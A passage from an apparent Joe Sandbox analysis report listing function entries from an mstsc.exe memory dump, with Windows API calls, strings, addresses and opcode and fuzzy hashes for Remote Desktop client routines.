                                                                                                                                                                                    • API ID: Library$ErrorFindFreeLastLoadResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3418355812-0
                                                                                                                                                                                    • Opcode ID: a929dfb8db89837fa206279e2039adb1e3d0434bfd89bf6f17b3b99f4ef4e3fa
                                                                                                                                                                                    • Instruction ID: ad81cf28f183604b8eb7fb4aa681947cbd45bdd6a21fa6c8d49eab38472b5a23
                                                                                                                                                                                    • Opcode Fuzzy Hash: a929dfb8db89837fa206279e2039adb1e3d0434bfd89bf6f17b3b99f4ef4e3fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8131C9B0B0421DABDB21AB54CC44BFE77B8EF84310F0084B9FA15A7240DB709ED19B94
                                                                                                                                                                                    Function 0094D3DF Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134memoryencryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 0094D40E
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0094D46B
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressAllocBinaryCryptFreeHandleLibraryLocalMessageModuleProcStringTrace
                                                                                                                                                                                    • String ID: szEncoded
                                                                                                                                                                                    • API String ID: 73248781-2519130501
                                                                                                                                                                                    • Opcode ID: 2a79812b748e1a1352daaa28be1b6026128a3577b3c901828a804de1512f3d75
                                                                                                                                                                                    • Instruction ID: 345214f735df2b6f88a7dae85aa4ae7041786635469574b9d8a3e759d546d631
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a79812b748e1a1352daaa28be1b6026128a3577b3c901828a804de1512f3d75
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5741E075219304AFDB2A8F18EC49F2A3BAAEB89318F00445DF945DB2A6CB74DC40DB55
                                                                                                                                                                                    Function 0095B0AA Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0095B0D2
                                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,00000010), ref: 0095B12F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0095B157
                                                                                                                                                                                    • GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 0095B17A
                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0095B19E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000A,0091396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00943B87), ref: 0091D673
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$AddressComputerFreeHandleLibraryMessageModuleNameProcTrace_wcsnicmpwcschr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 940169717-0
                                                                                                                                                                                    • Opcode ID: e329735cbbf477a401e9b6fa2d326b5d1b8e802bb6e2aa419b627db6793db81c
                                                                                                                                                                                    • Instruction ID: b5a8c6d87a0f4ead0202442e33ea5c53212db5b59ed38e91ee6236a4d3576890
                                                                                                                                                                                    • Opcode Fuzzy Hash: e329735cbbf477a401e9b6fa2d326b5d1b8e802bb6e2aa419b627db6793db81c
                                                                                                                                                                                    • Instruction Fuzzy Hash: D0314872618708AFD724CF65DC65BAB7BA8EB44311F00002EED00E7291DBB5DC449F91
                                                                                                                                                                                    Function 009640B9 Relevance: 7.6, APIs: 5, Instructions: 55encryptionmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptDecodeObject.CRYPT32(00000000,00000024,00000000,?,00000000,00000000,?), ref: 009640D4
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,00964328,?,?,00000000,00000000,?,?,00000000), ref: 009640E5
                                                                                                                                                                                    • CryptDecodeObject.CRYPT32(00000000,00000024,00000000,?,00000000,00000000,?), ref: 009640FE
                                                                                                                                                                                    • LocalFree.KERNEL32(00964328,?,00964328,?,?,00000000,00000000,?,?,00000000), ref: 0096410A
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00964328,?,?,00000000,00000000,?,?,00000000), ref: 00964113
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CryptDecodeLocalObject$AllocErrorFreeLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1386893860-0
                                                                                                                                                                                    • Opcode ID: c0e642117cd3f9973a36a11f36cc4dafd45ca80346ba26b5935881ec46ebc992
                                                                                                                                                                                    • Instruction ID: cb770779dfc4ed5fcc151446d757fa6f3af3a3a40ddf4edf106dceac0d08868d
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0e642117cd3f9973a36a11f36cc4dafd45ca80346ba26b5935881ec46ebc992
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29012271308206BBEB201FA1DC09F677BACEF36796F114019FA80D50A0E7B4C880EB60
                                                                                                                                                                                    Function 00918810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 00918829
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 00918841
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091884B
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressErrorFreeHandleIconicLastLibraryMessageModulePlacementProcTraceWindow
                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                    • API String ID: 3754642993-3772416878
                                                                                                                                                                                    • Opcode ID: b1916a9330928a74c638dcef683db1eba96f34463a9f88b94cb7ed80dc8a3129
                                                                                                                                                                                    • Instruction ID: bfb6a54f3e3d66b7d93e5231b55be16d22c7057e18e0298b4551cbb33de87418
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1916a9330928a74c638dcef683db1eba96f34463a9f88b94cb7ed80dc8a3129
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02119D71624308BBDB189F60DC09BBABBA9FF45304F94019DE810971A0DF709C92EB51
                                                                                                                                                                                    Function 0091C134 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32 ref: 0091C149
                                                                                                                                                                                    • IsIconic.USER32(?), ref: 0091C176
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleIconicLibraryMessageModuleProcTraceVisibleWindow
                                                                                                                                                                                    • String ID: ShowShutdownDialog
                                                                                                                                                                                    • API String ID: 285738821-2398949525
                                                                                                                                                                                    • Opcode ID: e2a6c9086432098319509f33d86e98c0cb0dbfac652c907d93963d4d6d383ec2
                                                                                                                                                                                    • Instruction ID: 303c0a9b8b12460eab56521d5a0d4aa7ac0225fa4c4965b6cc91017c26869797
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2a6c9086432098319509f33d86e98c0cb0dbfac652c907d93963d4d6d383ec2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 773105B1794308AFE724AF74C849FBB37A9EB84310F10482DE85297292CA75EC819B51
                                                                                                                                                                                    Function 00964143 Relevance: 4.6, APIs: 3, Instructions: 63timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemTime.KERNEL32(0090B55C,?,?,?,?,009643E7,0090B55C,?,?,?,00000000), ref: 0096416D
                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(0090B55C,?,?,009643E7,0090B55C,?,?,?,00000000), ref: 0096417B
                                                                                                                                                                                    • GetLastError.KERNEL32(?,009643E7,0090B55C,?,?,?,00000000), ref: 00964185
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$System$ErrorFileLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2409880431-0
                                                                                                                                                                                    • Opcode ID: 41da7dce399370cb01da6ab2f73409f910e6d3c4567ed9b917b6dec335d277be
                                                                                                                                                                                    • Instruction ID: 8cd1987fd8f77d18d97147bf72ead1bbdd055f0bcc177b3d4e4f62c21fc9ac24
                                                                                                                                                                                    • Opcode Fuzzy Hash: 41da7dce399370cb01da6ab2f73409f910e6d3c4567ed9b917b6dec335d277be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D11E272A1821BCFCB10DFD4CC8096EB7B9FB76320B22476AD82597240D738DD808B90
                                                                                                                                                                                    Function 0094B92E Relevance: 1.6, APIs: 1, Instructions: 149comCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoCreateInstance.OLE32(009011B4,00000000,00000001,00901194,?), ref: 0094B9DF
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCreateFreeHandleInstanceLibraryModuleProc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3463782917-0
                                                                                                                                                                                    • Opcode ID: 36b3cd4b703b4581b5374a8faf23d2bd574d8c3b7268b968762b9573d596fe4f
                                                                                                                                                                                    • Instruction ID: 0026011706b739b83c25700486f78285ceed252b77e534e51b6b2803c0683aa4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36b3cd4b703b4581b5374a8faf23d2bd574d8c3b7268b968762b9573d596fe4f
                                                                                                                                                                                    • Instruction Fuzzy Hash: F3519271A28344AFDB29DF94C854F657BEAEB4D308F140098F6419B2A2C7B1DC90EF55
                                                                                                                                                                                    Function 0091FBC7 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 299windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0091FC13
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000216), ref: 0091FCA3
                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 0091FCFF
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0091FD13
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,?,?,?,00000004), ref: 0091FD36
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0091FD40
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0091FD4E
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0091FD80
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0091FD89
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0091FDAB
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0091FDC7
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0091FDD1
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,?,?,?,0000000C), ref: 0091FE0A
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00003391), ref: 0091FE27
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0091FE41
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0091FE49
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0091FE53
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,0000000E), ref: 0091FEB5
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,0000000E), ref: 0091FED9
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0091FEE7
                                                                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000001), ref: 0091FF3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: RectWindow$Client$Invalidate$ItemLongVisible
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 310215485-2766056989
                                                                                                                                                                                    • Opcode ID: fadb3e85e506658efb99d7c39c665e5c3c40d78540e93208a2c678146359c158
                                                                                                                                                                                    • Instruction ID: b8ec9c41e2ad25f439fbaed076886fe003c51a9a9a829503c9c24f9e7c206941
                                                                                                                                                                                    • Opcode Fuzzy Hash: fadb3e85e506658efb99d7c39c665e5c3c40d78540e93208a2c678146359c158
                                                                                                                                                                                    • Instruction Fuzzy Hash: F9C13972218208AFD704DF68CD84A6BBBE9EF88704F044A6DF985A7265C770ED41DF52
                                                                                                                                                                                    Function 00963289 Relevance: 35.5, APIs: 10, Strings: 10, Instructions: 462COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SafeArrayUnlock.OLEAUT32(00000000), ref: 00963843
                                                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(00000000), ref: 0096384E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ArraySafe$AddressDestroyFreeHandleLibraryModuleProcUnlock
                                                                                                                                                                                    • String ID: AllowSetForegroundWindow failed!$CoCreateInstance failed!$Params.SetAt failed!$bstrCommandLine$bstrRDPFileName$saParams.Create failed!$spRemoteDesktopClient->GetProcessId failed!$spRemoteDesktopClient->StartRemoteApplication failed!$spWorkspace->GetProcessId failed!$spWorkspace->StartRemoteApplication failed!
                                                                                                                                                                                    • API String ID: 2590906998-1740355100
                                                                                                                                                                                    • Opcode ID: c7f1387fb7062d57a4b0b02d93cb83a806cc744f920dd566657e69c0b3262db1
                                                                                                                                                                                    • Instruction ID: 38ad42501566cd25398258b4cab3f781eec047abdaef72fd296a82524cc2cdf5
                                                                                                                                                                                    • Opcode Fuzzy Hash: c7f1387fb7062d57a4b0b02d93cb83a806cc744f920dd566657e69c0b3262db1
                                                                                                                                                                                    • Instruction Fuzzy Hash: FEF1A171A04345AFDB16CF55CC49FA67BEAABC9708F15805CF501AB2A2C770CA41EFA1
                                                                                                                                                                                    Function 0093B2B8 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 337COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0093B2F7
                                                                                                                                                                                    • _wtol.MSVCRT ref: 0093B365
                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0093B3B5
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0093B3CC
                                                                                                                                                                                    • SetTextColor.GDI32(00000000,00993300), ref: 0093B3DE
                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0093B3E7
                                                                                                                                                                                    • SetMapMode.GDI32(00000000,00000001), ref: 0093B3F0
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0093B406
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0093B440
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0093B54B
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0093B586
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0093B594
                                                                                                                                                                                    • DrawTextW.USER32(00000000,?,?,?,?), ref: 0093B5C8
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0093B5F4
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0093B65D
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0093B66F
                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0093B676
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0093B73E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$Select$Delete$LongModeTextWindow$AddressClientColorCompatibleCreateDrawErrorFreeHandleLastLibraryMessageModuleProcRectTrace_wtol
                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                    • API String ID: 1029568502-2564639436
                                                                                                                                                                                    • Opcode ID: 6dd857930eacb7b4be94aa7425c5e7a3c792e8f982d4e103e6fb4d4118ecbc43
                                                                                                                                                                                    • Instruction ID: 0fee14ea432b1f8ddfa3be419e51f6e40402c65d7d57a203ed606c6acabe2baf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dd857930eacb7b4be94aa7425c5e7a3c792e8f982d4e103e6fb4d4118ecbc43
                                                                                                                                                                                    • Instruction Fuzzy Hash: FAD1B371A08314AFDB25DF64DC88BAA7BB9EB89304F144089F605A72A2C771DD80EF55
                                                                                                                                                                                    Function 009150D0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 267filememoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0091510B
                                                                                                                                                                                    • CreateFileW.KERNEL32(00900A48,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00915154
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00915163
                                                                                                                                                                                    • CreateFileW.KERNEL32(8B55F12B,80000000,00000001,00000000,00000003,00000080,00000000), ref: 009151D0
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009151DF
                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0091523C
                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 00915245
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00915254
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 009152F7
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00915303
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00915314
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0091531B
                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00915337
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00915341
                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00915396
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009153A0
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00915400
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ErrorLast$Local$CloseCreateFreeHandleReadSize$Alloc_wcsicmpmemcmp
                                                                                                                                                                                    • String ID: HKEY_DYN_DATA
                                                                                                                                                                                    • API String ID: 2972365698-3361149836
                                                                                                                                                                                    • Opcode ID: 37b72bc86f5f88ac37d335127d7a202a22978313b1fe093136d3fcfc640196cc
                                                                                                                                                                                    • Instruction ID: 072d573dea7d99758482bce6ee9ac877cf04137fc71e19d468a38898b108a62b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37b72bc86f5f88ac37d335127d7a202a22978313b1fe093136d3fcfc640196cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7891E172708304EFD7259F24DC88F6A3BA9EB89354F16494DF961A71A1D7B0CC80EB51
                                                                                                                                                                                    Function 00959006 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 181libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0095B1E5: memset.MSVCRT ref: 0095B20A
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0095B23A
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0095B242
                                                                                                                                                                                      • Part of subcall function 0095B1E5: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0095B24F
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(sspicli.dll,00000000,00000000), ref: 0095902E
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00959065
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SspiUnmarshalAuthIdentity), ref: 0095908E
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009590C1
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00959229
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$AddressConditionLibraryMaskProc$FreeHandleInfoLoadModuleVerifyVersionmemset
